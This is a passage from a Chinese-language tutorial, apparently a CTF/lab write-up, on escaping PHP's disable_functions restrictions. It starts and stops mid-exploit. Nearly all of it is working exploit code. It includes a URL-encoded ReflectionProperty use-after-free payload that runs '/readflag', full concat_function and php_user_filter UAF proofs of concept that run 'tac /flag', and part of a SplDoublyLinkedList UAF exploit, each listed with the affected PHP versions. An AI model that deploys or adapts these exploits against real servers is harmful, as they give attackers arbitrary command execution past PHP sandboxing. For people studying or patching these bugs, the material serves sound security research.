  139. hex2bin(str_pad(dechex(s2n($php_heap) + 0x18 + 0x308 + 0x08), 8, "0",
  140. STR_PAD_LEFT))) . "\n";
  141. ($helper -> a)("/readflag");    // 需要执行的命令
复制代码
我们需要对其中用于测试的echo代码注释或删除掉,再将代码部分进行URL编码(一定要编码成一行):
  1. global%20%24abc%2C%20%24helper%3B%0Aclass%20Test%20%7B%0Apublic%20HelperHelperHelperHelperHelperHelperHelper%20%24prop%3B%0A%7D%0Aclass%20HelperHelperHelperHelperHelperHelperHelper%20%7B%0Apublic%20%24a%2C%20%24b%3B%0A%7D%0Afunction%20s2n(%24str)%20%7B%0A%24address%20%3D%200%3B%0Afor%20(%24i%3D0%3B%24i%3C4%3B%24i%2B%2B)%7B%0A%24address%20%3C%3C%3D%208%3B%0A%24address%20%7C%3D%20ord(%24str%5B4%20%2B%20%24i%5D)%3B%0A%7D%0Areturn%20%24address%3B%0A%7D%0Afunction%20s2b(%24str%2C%20%24offset)%7B%0Areturn%20hex2bin(str_pad(dechex(s2n(%24str)%20%2B%20%24offset%20-%200x10)%2C%208%2C%20%220%22%2C%0ASTR_PAD_LEFT))%3B%0A%7D%0Afunction%20leak(%24offset)%20%7B%0Aglobal%20%24abc%3B%0A%24data%20%3D%20%22%22%3B%0Afor%20(%24i%20%3D%200%3B%24i%20%3C%208%3B%24i%2B%2B)%7B%0A%24data%20.%3D%20%24abc%5B%24offset%20%2B%207%20-%20%24i%5D%3B%0A%7D%0Areturn%20%24data%3B%0A%7D%0Afunction%20leak2(%24address)%20%7B%0Aglobal%20%24helper%3B%0Awrite(0x20%2C%20%24address)%3B%0A%24leak%20%3D%20strlen(%24helper-%3Eb)%3B%0A%24leak%20%3D%20dechex(%24leak)%3B%0A%24leak%20%3D%20str_pad(%24leak%2C%2016%2C%20%220%22%2C%20STR_PAD_LEFT)%3B%0A%24leak%20%3D%20hex2bin(%24leak)%3B%0Areturn%20%24leak%3B%0A%7D%0Afunction%20write(%24offset%2C%20%24data)%20%7B%0Aglobal%20%24abc%3B%0A%24data%20%3D%20str_pad(%24data%2C%208%2C%20%22%5Cx00%22%2C%20STR_PAD_LEFT)%3B%0Afor%20(%24i%20%3D%200%3B%24i%20%3C%208%3B%24i%2B%2B)%7B%0A%24abc%5B%24offset%20%2B%20%24i%5D%20%3D%20%24data%5B7%20-%20%24i%5D%3B%0A%7D%0A%7D%0Afunction%20get_basic_funcs(%24std_object_handlers)%20%7B%0A%24prefix%20%3D%20substr(%24std_object_handlers%2C%200%2C%204)%3B%0A%24std_object_handlers%20%3D%20hexdec(bin2hex(%24std_object_handlers))%3B%0A%24start%20%3D%20%24std_object_handlers%20%26%200x00000000fffff000%20%7C%200x0000000000000920%3B%20%23%20change%200x920%20if%20finding%20failed%0A%24NumPrefix%20%3D%20%24std_object_handlers%20%26%200x0000ffffff000000%3B%0A%24NumPrefix%20%3D%20%24NumPrefix%20-%200x0000000001000000%3B%0A%24funcs%20%3D%20get_defined_functions()%5B'internal'%5D%3B%0Afor(%24i%20%3D%200%3B%20%24i%20%3C%200x1000%3B%20%24i%2B%2B)%20%7B%0A%24addr%20%3D%20%24start%20-%200x1000%20*%20%24i%3B%0A%24name_addr%20%3D%20bin2hex(leak2(%24prefix%20.%20hex2bin(str_pad(dechex(%24addr%20-%200x10)%2C%208%2C%0A%220%22%2C%20STR_PAD_LEFT))))%3B%0Aif%20(hexdec(%24name_addr)%20%3E%20%24std_object_handlers%20%7C%7C%20hexdec(%24name_addr)%20%3C%20%24NumPrefix)%0A%7B%0Acontinue%3B%0A%7D%0A%24name_addr%20%3D%20str_pad(%24name_addr%2C%2016%2C%20%220%22%2C%20STR_PAD_LEFT)%3B%0A%24name%20%3D%20strrev(leak2(%24prefix%20.%20s2b(hex2bin(%24name_addr)%2C%200x00)))%3B%0A%24name%20%3D%20explode(%22%5Cx00%22%2C%20%24name)%5B0%5D%3B%0Aif(in_array(%24name%2C%20%24funcs))%20%7B%0Areturn%20%5B%24name%2C%20bin2hex(%24prefix)%20.%20str_pad(dechex(%24addr)%2C%208%2C%20%220%22%2C%20STR_PAD_LEFT)%2C%0A%24std_object_handlers%2C%20%24NumPrefix%5D%3B%0A%7D%0A%7D%0A%7D%0Afunction%20getSystem(%24unknown_func)%20%7B%0A%24unknown_addr%20%3D%20hex2bin(%24unknown_func%5B1%5D)%3B%0A%24prefix%20%3D%20substr(%24unknown_addr%2C%200%2C%204)%3B%0A%24unknown_addr%20%3D%20hexdec(%24unknown_func%5B1%5D)%3B%0A%24start%20%3D%20%24unknown_addr%20%26%200x00000000ffffffff%3B%0Afor(%24i%20%3D%200%3B%24i%20%3C%200x800%3B%24i%2B%2B)%20%7B%0A%24addr%20%3D%20%24start%20-%200x20%20*%20%24i%3B%0A%24name_addr%20%3D%20bin2hex(leak2(%24prefix%20.%20hex2bin(str_pad(dechex(%24addr%20-%200x10)%2C%208%2C%0A%220%22%2C%20STR_PAD_LEFT))))%3B%0Aif%20(hexdec(%24name_addr)%20%3E%20%24unknown_func%5B2%5D%20%7C%7C%20hexdec(%24name_addr)%20%3C%0A%24unknown_func%5B3%5D)%20%7B%0Acontinue%3B%0A%7D%0A%24name_addr%20%3D%20str_pad(%24name_addr%2C%2016%2C%20%220%22%2C%20STR_PAD_LEFT)%3B%0A%24name%20%3D%20strrev(leak2(%24prefix%20.%20s2b(hex2bin(%24name_addr)%2C%200x00)))%3B%0Aif(strstr(%24name%2C%20%22system%22))%20%7B%0Areturn%20bin2hex(leak2(%24prefix%20.%20hex2bin(str_pad(dechex(%24addr%20-%200x10%20%2B%200x08)%2C%208%2C%0A%220%22%2C%20STR_PAD_LEFT))))%3B%0A%7D%0A%7D%0Afor(%24i%20%3D%200%3B%24i%20%3C%200x800%3B%24i%2B%2B)%20%7B%0A%24addr%20%3D%20%24start%20%2B%200x20%20*%20%24i%3B%0A%24name_addr%20%3D%20bin2hex(leak2(%24prefix%20.%20hex2bin(str_pad(dechex(%24addr%20-%200x10)%2C%208%2C%0A%220%22%2C%20STR_PAD_LEFT))))%3B%0Aif%20(hexdec(%24name_addr)%20%3E%20%24unknown_func%5B2%5D%20%7C%7C%20hexdec(%24name_addr)%20%3C%0A%24unknown_func%5B3%5D)%20%7B%0Acontinue%3B%0A%7D%0A%24name_addr%20%3D%20str_pad(%24name_addr%2C%2016%2C%20%220%22%2C%20STR_PAD_LEFT)%3B%0A%24name%20%3D%20strrev(leak2(%24prefix%20.%20s2b(hex2bin(%24name_addr)%2C%200x00)))%3B%0Aif(strstr(%24name%2C%20%22system%22))%20%7B%0Areturn%20bin2hex(leak2(%24prefix%20.%20hex2bin(str_pad(dechex(%24addr%20-%200x10%20%2B%200x08)%2C%208%2C%0A%220%22%2C%20STR_PAD_LEFT))))%3B%0A%7D%0A%7D%0A%7D%0A%24rp%20%3D%20new%20ReflectionProperty(Test%3A%3Aclass%2C%20'prop')%3B%0A%24test%20%3D%20new%20Test%3B%0A%24test%20-%3E%20prop%20%3D%20new%20HelperHelperHelperHelperHelperHelperHelper%3B%0A%24abc%20%3D%20%24rp%20-%3E%20getType()%20-%3E%20getName()%3B%0A%24helper%20%3D%20new%20HelperHelperHelperHelperHelperHelperHelper()%3B%0Aif%20(strlen(%24abc)%20%3C%201000)%20%7B%0Aexit(%22UAF%20Failed!%22)%3B%0A%7D%0A%24helper%20-%3E%20a%20%3D%20%24helper%3B%0A%24php_heap%20%3D%20leak(0x10)%3B%0A%24helper%20-%3E%20a%20%3D%20function(%24x)%7B%7D%3B%0A%24std_object_handlers%20%3D%20leak(0x0)%3B%0A%24prefix%20%3D%20substr(%24php_heap%2C%200%2C%204)%3B%0A%2F%2Fecho%20%22Helper%20Object%20Address%3A%20%22%20.%20bin2hex(%24php_heap)%20.%20%22%5Cn%22%3B%0A%2F%2Fecho%20%22std_object_handlers%20Address%3A%20%22%20.%20bin2hex(%24std_object_handlers)%20.%20%22%5Cn%22%3B%0A%24closure_object%20%3D%20leak(0x10)%3B%0A%2F%2Fecho%20%22Closure%20Object%3A%20%22%20.%20bin2hex(%24closure_object)%20.%20%22%5Cn%22%3B%0Awrite(0x28%2C%20%22%5Cx06%22)%3B%0Aif(!(%24unknown_func%20%3D%20get_basic_funcs(%24std_object_handlers)))%20%7B%0Adie(%22Couldn't%20determine%20funcs%20address%22)%3B%0A%7D%0A%2F%2Fecho%20%22Find%20func's%20adress%3A%20%22%20.%20%24unknown_func%5B1%5D%20.%20%22%20-%3E%20%22%20.%20%24unknown_func%5B0%5D%20.%20%22%5Cn%22%3B%0Aif(!(%24system_address%20%3D%20getSystem(%24unknown_func)))%20%7B%0Adie(%22Couldn't%20determine%20system%20address%22)%3B%0A%7D%0A%2F%2Fecho%20%22Find%20system's%20handler%3A%20%22%20.%20%24system_address%20.%20%22%5Cn%22%3B%0Afor%20(%24i%20%3D%200%3B%24i%20%3C%20(0x130%20%2F%200x08)%3B%24i%2B%2B)%20%7B%0Awrite(0x308%20%2B%200x08%20*%20(%24i%20%2B%201)%2C%20leak2(%24prefix%20.%20s2b(%24closure_object%2C%200x08%20*%0A%24i)))%3B%0A%7D%0A%24abc%5B0x308%20%2B%200x40%5D%20%3D%20%22%5Cx01%22%3B%0Awrite(0x308%20%2B%200x70%2C%20hex2bin(%24system_address))%3B%0Awrite(0x10%2C%20%24prefix%20.%20hex2bin(dechex(s2n(%24php_heap)%20%2B%200x18%20%2B%200x308%20%2B%200x08)))%3B%0A%2F%2F%20echo%20%22Fake%20Closure%20Object%20Address%3A%20%22%20.%20bin2hex(%24prefix%20.%0A%2F%2F%20hex2bin(str_pad(dechex(s2n(%24php_heap)%20%2B%200x18%20%2B%200x308%20%2B%200x08)%2C%208%2C%20%220%22%2C%0A%2F%2F%20STR_PAD_LEFT)))%20.%20%22%5Cn%22%3B%0A(%24helper%20-%3E%20a)(%22%2Freadflag%22)%3B
复制代码
在WebShell中提交即可执行命令。
在审计蚁剑disable_functions插件也可以很明显看出就是套用了官方的EXP
PHP concat_function UAF
漏洞简介
此漏洞利用处理字符串连接的函数中的错误进行攻击。如果满足某些条件,诸如$a.$b之类的语句可能会导致内存损坏。
漏洞利用条件
•Linux 操作系统•PHP 版本•7.3 - all versions to date•7.4 - all versions to date•8.0 - all versions to date•8.1 - all versions to date
靶场环境
[size=1em]虽然该靶场是蚁剑用来测试iconv漏洞的,但经过测试此靶场也可成功复现该漏洞。
靶场突破
这里用到了国外大佬mm0r1写的EXP:
  1. <?php

  3. # PHP 7.3-8.1 disable_functions bypass PoC (*nix only)
  4. #
  5. # Bug: https://bugs.php.net/bug.php?id=81705
  6. #ok
  7. # This exploit should work on all PHP 7.3-8.1 versions
  8. # released as of 2022-01-07
  9. #
  10. # Author: https://github.com/mm0r1

  12. new Pwn("tac /flag");            // 可替换成需要执行的命令

  14. class Helper { public $a, $b, $c; }
  15. class Pwn {
  16.     const LOGGING = false;
  17.     const CHUNK_DATA_SIZE = 0x60;
  18.     const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE;
  19.     const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1;

  21.     const HT_SIZE = 0x118;
  22.     const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1;

  24.     public function __construct($cmd) {
  25.         for($i = 0; $i < 10; $i++) {
  26.             $groom[] = self::alloc(self::STRING_SIZE);
  27.             $groom[] = self::alloc(self::HT_STRING_SIZE);
  28.         }
  29.         
  30.         $concat_str_addr = self::str2ptr($this->heap_leak(), 16);
  31.         $fill = self::alloc(self::STRING_SIZE);

  33.         $this->abc = self::alloc(self::STRING_SIZE);
  34.         $abc_addr = $concat_str_addr + self::CHUNK_SIZE;
  35.         self::log("abc @ 0x%x", $abc_addr);

  37.         $this->free($abc_addr);
  38.         $this->helper = new Helper;
  39.         if(strlen($this->abc) < 0x1337) {
  40.             self::log("uaf failed");
  41.             return;
  42.         }

  44.         $this->helper->a = "leet";
  45.         $this->helper->b = function($x) {};
  46.         $this->helper->c = 0xfeedface;

  48.         $helper_handlers = $this->rel_read(0);
  49.         self::log("helper handlers @ 0x%x", $helper_handlers);

  51.         $closure_addr = $this->rel_read(0x20);
  52.         self::log("real closure @ 0x%x", $closure_addr);

  54.         $closure_ce = $this->read($closure_addr + 0x10);
  55.         self::log("closure class_entry @ 0x%x", $closure_ce);
  56.         
  57.         $basic_funcs = $this->get_basic_funcs($closure_ce);
  58.         self::log("basic_functions @ 0x%x", $basic_funcs);

  60.         $zif_system = $this->get_system($basic_funcs);
  61.         self::log("zif_system @ 0x%x", $zif_system);

  63.         $fake_closure_off = 0x70;
  64.         for($i = 0; $i < 0x138; $i += 8) {
  65.             $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i));
  66.         }
  67.         $this->rel_write($fake_closure_off + 0x38, 1, 4);
  68.         $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
  69.         $this->rel_write($fake_closure_off + $handler_offset, $zif_system);

  71.         $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18;
  72.         self::log("fake closure @ 0x%x", $fake_closure_addr);

  74.         $this->rel_write(0x20, $fake_closure_addr);
  75.         ($this->helper->b)($cmd);

  77.         $this->rel_write(0x20, $closure_addr);
  78.         unset($this->helper->b);
  79.     }

  81.     private function heap_leak() {
  82.         $arr = [[], []];
  83.         set_error_handler(function() use (&$arr, &$buf) {
  84.             $arr = 1;
  85.             $buf = str_repeat("\x00", self::HT_STRING_SIZE);
  86.         });
  87.         $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array"));
  88.         return $buf;
  89.     }

  91.     private function free($addr) {
  92.         $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr);
  93.         $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload));
  94.         
  95.         $arr = [[], []];
  96.         set_error_handler(function() use (&$arr, &$buf, &$payload) {
  97.             $arr = 1;
  98.             $buf = str_repeat($payload, 1);
  99.         });
  100.         $arr[1] .= "x";
  101.     }

  103.     private function rel_read($offset) {
  104.         return self::str2ptr($this->abc, $offset);
  105.     }

  107.     private function rel_write($offset, $value, $n = 8) {
  108.         for ($i = 0; $i < $n; $i++) {
  109.             $this->abc[$offset + $i] = chr($value & 0xff);
  110.             $value >>= 8;
  111.         }
  112.     }

  114.     private function read($addr, $n = 8) {
  115.         $this->rel_write(0x10, $addr - 0x10);
  116.         $value = strlen($this->helper->a);
  117.         if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
  118.         return $value;
  119.     }

  121.     private function get_system($basic_funcs) {
  122.         $addr = $basic_funcs;
  123.         do {
  124.             $f_entry = $this->read($addr);
  125.             $f_name = $this->read($f_entry, 6);
  126.             if($f_name === 0x6d6574737973) {
  127.                 return $this->read($addr + 8);
  128.             }
  129.             $addr += 0x20;
  130.         } while($f_entry !== 0);
  131.     }

  133.     private function get_basic_funcs($addr) {
  134.         while(true) {
  135.             // In rare instances the standard module might lie after the addr we're starting
  136.             // the search from. This will result in a SIGSGV when the search reaches an unmapped page.
  137.             // In that case, changing the direction of the search should fix the crash.
  138.             // $addr += 0x10;
  139.             $addr -= 0x10;
  140.             if($this->read($addr, 4) === 0xA8 &&
  141.                 in_array($this->read($addr + 4, 4),
  142.                     [20180731, 20190902, 20200930, 20210902])) {
  143.                 $module_name_addr = $this->read($addr + 0x20);
  144.                 $module_name = $this->read($module_name_addr);
  145.                 if($module_name === 0x647261646e617473) {
  146.                     self::log("standard module @ 0x%x", $addr);
  147.                     return $this->read($addr + 0x28);
  148.                 }
  149.             }
  150.         }
  151.     }

  153.     private function log($format, $val = "") {
  154.         if(self::LOGGING) {
  155.             printf("{$format}\n", $val);
  156.         }
  157.     }

  159.     static function alloc($size) {
  160.         return str_shuffle(str_repeat("A", $size));
  161.     }

  163.     static function str2ptr($str, $p = 0, $n = 8) {
  164.         $address = 0;
  165.         for($j = $n - 1; $j >= 0; $j--) {
  166.             $address <<= 8;
  167.             $address |= ord($str[$p + $j]);
  168.         }
  169.         return $address;
  170.     }
  171. }

  173. ?>
  174. 直接访问即可执行命令。

  176. PHP user_filter
  177. 漏洞简介:

  179. 这是一个十分严重的内存破坏漏洞,而且早在十年前就已经有人在官网上提交过此漏洞的相关细节。如今这个漏洞依然存在。

  181. 漏洞细节:https://bugs.php.net/bug.php?id=54350

  183. 漏洞利用条件:

  185. •Linux 操作系统
  186. •PHP 版本
  187. •5.* - exploitable with minor changes to the PoC
  188. •7.0 - all versions to date
  189. •7.1 - all versions to date
  190. •7.2 - all versions to date
  191. •7.3 - all versions to date
  192. •7.4 < 7.4.26
  193. •8.0 < 8.0.13

  195. 靶场环境:

  197. 项目地址:https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/7

  199. 虽然该靶场是蚁剑用来测试GC UAF漏洞的,但经过测试此靶场也可成功复现该漏洞。

  201. 靶场突破:

  203. 这里用到了国外大佬mm0r1写的EXP:

  205. <?php
  206. # PHP 7.0-8.0 disable_functions bypass PoC (*nix only)
  207. #
  208. # Bug: https://bugs.php.net/bug.php?id=54350
  209. #
  210. # This exploit should work on all PHP 7.0-8.0 versions
  211. # released as of 2021-10-06
  212. #
  213. # Author: https://github.com/mm0r1

  215. pwn("tac /flag");            // 可替换成需要执行的命令

  217. function pwn($cmd) {
  218.     define('LOGGING', false);
  219.     define('CHUNK_DATA_SIZE', 0x60);
  220.     define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
  221.     define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
  222.     define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
  223.     define('CMD', $cmd);
  224.     for($i = 0; $i < 10; $i++) {
  225.         $groom[] = Pwn::alloc(STRING_SIZE);
  226.     }
  227.     stream_filter_register('pwn_filter', 'Pwn');
  228.     $fd = fopen('php://memory', 'w');
  229.     stream_filter_append($fd,'pwn_filter');
  230.     fwrite($fd, 'x');
  231. }

  233. class Helper { public $a, $b, $c; }
  234. class Pwn extends php_user_filter {
  235.     private $abc, $abc_addr;
  236.     private $helper, $helper_addr, $helper_off;
  237.     private $uafp, $hfp;

  239.     public function filter($in, $out, &$consumed, $closing) {
  240.         if($closing) return;
  241.         stream_bucket_make_writeable($in);
  242.         $this->filtername = Pwn::alloc(STRING_SIZE);
  243.         fclose($this->stream);
  244.         $this->go();
  245.         return PSFS_PASS_ON;
  246.     }

  248.     private function go() {
  249.         $this->abc = &$this->filtername;

  251.         $this->make_uaf_obj();

  253.         $this->helper = new Helper;
  254.         $this->helper->b = function($x) {};

  256.         $this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
  257.         $this->log("helper @ 0x%x", $this->helper_addr);

  259.         $this->abc_addr = $this->helper_addr - CHUNK_SIZE;
  260.         $this->log("abc @ 0x%x", $this->abc_addr);

  262.         $this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;

  264.         $helper_handlers = $this->str2ptr(CHUNK_SIZE);
  265.         $this->log("helper handlers @ 0x%x", $helper_handlers);

  267.         $this->prepare_leaker();

  269.         $binary_leak = $this->read($helper_handlers + 8);
  270.         $this->log("binary leak @ 0x%x", $binary_leak);
  271.         $this->prepare_cleanup($binary_leak);

  273.         $closure_addr = $this->str2ptr($this->helper_off + 0x38);
  274.         $this->log("real closure @ 0x%x", $closure_addr);

  276.         $closure_ce = $this->read($closure_addr + 0x10);
  277.         $this->log("closure class_entry @ 0x%x", $closure_ce);

  279.         $basic_funcs = $this->get_basic_funcs($closure_ce);
  280.         $this->log("basic_functions @ 0x%x", $basic_funcs);

  282.         $zif_system = $this->get_system($basic_funcs);
  283.         $this->log("zif_system @ 0x%x", $zif_system);

  285.         $fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
  286.         for($i = 0; $i < 0x138; $i += 8) {
  287.             $this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
  288.         }
  289.         $this->write($fake_closure_off + 0x38, 1, 4);

  291.         $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
  292.         $this->write($fake_closure_off + $handler_offset, $zif_system);

  294.         $fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
  295.         $this->write($this->helper_off + 0x38, $fake_closure_addr);
  296.         $this->log("fake closure @ 0x%x", $fake_closure_addr);

  298.         $this->cleanup();
  299.         ($this->helper->b)(CMD);
  300.     }

  302.     private function make_uaf_obj() {
  303.         $this->uafp = fopen('php://memory', 'w');
  304.         fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
  305.         for($i = 0; $i < STRING_SIZE; $i++) {
  306.             fwrite($this->uafp, "\x00");
  307.         }
  308.     }

  310.     private function prepare_leaker() {
  311.         $str_off = $this->helper_off + CHUNK_SIZE + 8;
  312.         $this->write($str_off, 2);
  313.         $this->write($str_off + 0x10, 6);

  315.         $val_off = $this->helper_off + 0x48;
  316.         $this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
  317.         $this->write($val_off + 8, 0xA);
  318.     }

  320.     private function prepare_cleanup($binary_leak) {
  321.         $ret_gadget = $binary_leak;
  322.         do {
  323.             --$ret_gadget;
  324.         } while($this->read($ret_gadget, 1) !== 0xC3);
  325.         $this->log("ret gadget = 0x%x", $ret_gadget);
  326.         $this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
  327.         $this->write(8, $ret_gadget);
  328.     }

  330.     private function read($addr, $n = 8) {
  331.         $this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
  332.         $value = strlen($this->helper->c);
  333.         if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
  334.         return $value;
  335.     }

  337.     private function write($p, $v, $n = 8) {
  338.         for($i = 0; $i < $n; $i++) {
  339.             $this->abc[$p + $i] = chr($v & 0xff);
  340.             $v >>= 8;
  341.         }
  342.     }

  344.     private function get_basic_funcs($addr) {
  345.         while(true) {
  346.             // In rare instances the standard module might lie after the addr we're starting
  347.             // the search from. This will result in a SIGSGV when the search reaches an unmapped page.
  348.             // In that case, changing the direction of the search should fix the crash.
  349.             // $addr += 0x10;
  350.             $addr -= 0x10;
  351.             if($this->read($addr, 4) === 0xA8 &&
  352.                 in_array($this->read($addr + 4, 4),
  353.                     [20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
  354.                 $module_name_addr = $this->read($addr + 0x20);
  355.                 $module_name = $this->read($module_name_addr);
  356.                 if($module_name === 0x647261646e617473) {
  357.                     $this->log("standard module @ 0x%x", $addr);
  358.                     return $this->read($addr + 0x28);
  359.                 }
  360.             }
  361.         }
  362.     }

  364.     private function get_system($basic_funcs) {
  365.         $addr = $basic_funcs;
  366.         do {
  367.             $f_entry = $this->read($addr);
  368.             $f_name = $this->read($f_entry, 6);
  369.             if($f_name === 0x6d6574737973) {
  370.                 return $this->read($addr + 8);
  371.             }
  372.             $addr += 0x20;
  373.         } while($f_entry !== 0);
  374.     }

  376.     private function cleanup() {
  377.         $this->hfp = fopen('php://memory', 'w');
  378.         fwrite($this->hfp, pack('QQ', 0, $this->abc_addr));
  379.         for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
  380.             fwrite($this->hfp, "\x00");
  381.         }
  382.     }

  384.     private function str2ptr($p = 0, $n = 8) {
  385.         $address = 0;
  386.         for($j = $n - 1; $j >= 0; $j--) {
  387.             $address <<= 8;
  388.             $address |= ord($this->abc[$p + $j]);
  389.         }
  390.         return $address;
  391.     }

  393.     private function ptr2str($ptr, $n = 8) {
  394.         $out = '';
  395.         for ($i = 0; $i < $n; $i++) {
  396.             $out .= chr($ptr & 0xff);
  397.             $ptr >>= 8;
  398.         }
  399.         return $out;
  400.     }

  402.     private function log($format, $val = '') {
  403.         if(LOGGING) {
  404.             printf("{$format}\n", $val);
  405.         }
  406.     }

  408.     static function alloc($size) {
  409.         return str_shuffle(str_repeat('A', $size));
  410.     }
  411. }
  412. ?>
复制代码
直接访问即可执行命令。
PHP SplDoublyLinkedList UAF
漏洞简介
PHP的SplDoublyLinkedList双向链表库中存在一个用后释放漏洞,该漏洞将允许攻击者通过运行PHP代码来转义disable_functions限制函数。在该漏洞的帮助下,远程攻击者将能够实现PHP沙箱逃逸,并执行任意代码。更准确地来说,成功利用该漏洞后,攻击者将能够绕过PHP的某些限制,例如disable_functions和safe_mode等等。
[size=1em]有关该漏洞的详细分析,可以参考下面这篇文章:
[size=1em]https://www.freebuf.com/articles/web/251017.html
漏洞利用条件
•PHP版本•PHP v8.0(Alpha)•PHP v7.4.10及其之前版本
漏洞靶场
[size=1em]虽然该靶场是蚁剑用来测试iconv漏洞的,但经过测试此靶场也可成功复现该漏洞。
靶场突破
EXP出自这篇文章:https://xz.aliyun.com/t/8355#toc-3
  1. <?php
  2. error_reporting(0);
  3. $a = str_repeat("T", 120 * 1024 * 1024);
  4. function i2s(&$a, $p, $i, $x = 8) {
  5.     for($j = 0;$j < $x;$j++) {
  6.         $a[$p + $j] = chr($i & 0xff);
  7.         $i >>= 8;
  8.     }
  9. }

  11. function s2i($s) {
  12.     $result = 0;
  13.     for ($x = 0;$x < strlen($s);$x++) {
  14.         $result <<= 8;
  15.         $result |= ord($s[$x]);
  16.     }
  17.     return $result;
  18. }

  20. function leak(&$a, $address) {
  21.     global $s;
  22.     i2s($a, 0x00, $address - 0x10);
  23.     return strlen($s -> current());
  24. }

  26. function getPHPChunk($maps) {
  27.     $pattern = '/([0-9a-f]+\-[0-9a-f]+) rw\-p 00000000 00:00 0 /';
  28.     preg_match_all($pattern, $maps, $match);
  29.     foreach ($match[1] as $value) {
  30.         list($start, $end) = explode("-", $value);
  31.         if (($length = s2i(hex2bin($end)) - s2i(hex2bin($start))) >= 0x200000 && $length <= 0x300000) {
  32.             $address = array(s2i(hex2bin($start)), s2i(hex2bin($end)), $length);
  33.             echo "[+]PHP Chunk: " . $start . " - " . $end . ", length: 0x" . dechex($length) . "\n";
  34.             return $address;
  35.         }
  36.     }
  37. }

  39. function bomb1(&$a) {
  40.     if (leak($a, s2i($_GET["test1"])) === 0x5454545454545454) {
  41.         return (s2i($_GET["test1"]) & 0x7ffff0000000);
  42.     }else {
  43.         die("[!]Where is here");
  44.     }
  45. }

  47. function bomb2(&$a) {
  48.     $start = s2i($_GET["test2"]);
  49.     return getElement($a, array($start, $start + 0x200000, 0x200000));
  50.     die("[!]Not Found");
  51. }

  53. function getElement(&$a, $address) {
  54.     for ($x = 0;$x < ($address[2] / 0x1000 - 2);$x++) {
  55.         $addr = 0x108 + $address[0] + 0x1000 * $x + 0x1000;
  56.         for ($y = 0;$y < 5;$y++) {
  57.             if (leak($a, $addr + $y * 0x08) === 0x1234567812345678 && ((leak($a, $addr + $y * 0x08 - 0x08) & 0xffffffff) === 0x01)){
  58.                 echo "[+]SplDoublyLinkedList Element: " . dechex($addr + $y * 0x08 - 0x18) . "\n";
  59.                 return $addr + $y * 0x08 - 0x18;
  60.             }
  61.         }
  62.     }
  63. }

  65. function getClosureChunk(&$a, $address) {
  66.     do {
  67.         $address = leak($a, $address);
  68.     }while(leak($a, $address) !== 0x00);
  69.     echo "[+]Closure Chunk: " . dechex($address) . "\n";
  70.     return $address;
  71. }

  73. function getSystem(&$a, $address) {
  74.     $start = $address & 0xffffffffffff0000;
  75.     $lowestAddr = ($address & 0x0000fffffff00000) - 0x0000000001000000;
  76.     for($i = 0; $i < 0x1000 * 0x80; $i++) {
  77.         $addr = $start - $i * 0x20;
  78.         if ($addr < $lowestAddr) {
  79.             break;
  80.         }
  81.         $nameAddr = leak($a, $addr);
  82.         if ($nameAddr > $address || $nameAddr < $lowestAddr) {
  83.             continue;
  84.         }
  85.         $name = dechex(leak($a, $nameAddr));
  86.         $name = str_pad($name, 16, "0", STR_PAD_LEFT);
  87.         $name = strrev(hex2bin($name));
  88.         $name = explode("\x00", $name)[0];
  89.         if($name === "system") {
  90.             return leak($a, $addr + 0x08);
  91.         }
  92.     }
  93. }

  95. class Trigger {
  96.     function __destruct() {
  97.         global $s;
  98.         unset($s[0]);
  99.         $a = str_shuffle(str_repeat("T", 0xf));
  100.         i2s($a, 0x00, 0x1234567812345678);
  101.         i2s($a, 0x08, 0x04, 7);
  102.         $s -> current();
  103.         $s -> next();
  104.         if ($s -> current() !== 0x1234567812345678) {
  105.              die("[!]UAF Failed");
  106.         }
  107.         $maps = file_get_contents("/proc/self/maps");
  108.         if (!$maps) {
  109.             cantRead($a);
  110.         }else {
  111.             canRead($maps, $a);
  112.         }
  113.         echo "[+]Done";
  114.     }
  115. }

  117. function bypass($elementAddress, &$a) {
  118.     global $s;
  119.     if (!$closureChunkAddress = getClosureChunk($a, $elementAddress)) {
  120.         die("[!]Get Closure Chunk Address Failed");
  121.     }
  122.     $closure_object = leak($a, $closureChunkAddress + 0x18);
  123.     echo "[+]Closure Object: " . dechex($closure_object) . "\n";
  124.     $closure_handlers = leak($a, $closure_object + 0x18);
  125.     echo "[+]Closure Handler: " . dechex($closure_handlers) . "\n";
  126.     if(!($system_address = getSystem($a, $closure_handlers))) {
  127.         die("[!]Couldn't determine system address");
  128.     }
  129.     echo "[+]Find system's handler: " . dechex($system_address) . "\n";
  130.     i2s($a, 0x08, 0x506, 7);
  131.     for ($i = 0;$i < (0x130 / 0x08);$i++) {
  132.         $data = leak($a, $closure_object + 0x08 * $i);
  133.         i2s($a, 0x00, $closure_object + 0x30);
  134.         i2s($s -> current(), 0x08 * $i + 0x100, $data);
  135.     }
  136.     i2s($a, 0x00, $closure_object + 0x30);
  137.     i2s($s -> current(), 0x20, $system_address);
